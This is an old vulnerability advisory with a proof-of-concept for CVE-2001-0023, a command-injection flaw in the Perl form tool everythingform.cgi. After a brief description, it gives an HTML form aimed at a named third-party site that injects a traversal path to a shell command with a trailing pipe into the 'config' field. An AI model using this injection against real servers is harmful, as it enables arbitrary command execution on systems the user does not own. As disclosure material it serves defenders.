Leif M. Wright everythingform.cgi 2.0 - Arbitrary Command Execution

Related Vulnerabilities: CVE-2001-0023  
Publish Date: 11 Dec 2000
Author: rpc
                source: http://www.securityfocus.com/bid/2101/info

An input validation vulnerability exists in Leif M. Wright's everything.cgi, a Perl-based form design tool.

The script fails to properly filter shell commands from user-supplied input to the 'config' field.

As a result, the script can be made to run arbitrary shell commands with the privilege of the web server.

<form action="http://www.conservatives.net/someplace/everythingform.cgi"
<h1>everythingform.cgi exploit</h1>
Command: <input type=text name=config value="../../../../../../../../bin/ping
-c 5 www.foobar.com|">
<input type=hidden name=Name value="expletive deleted">
<input type=hidden name="e-mail" value="foo@bar.net">
<input type=hidden name=FavoriteColor value=Black>
<input type=submit value=run>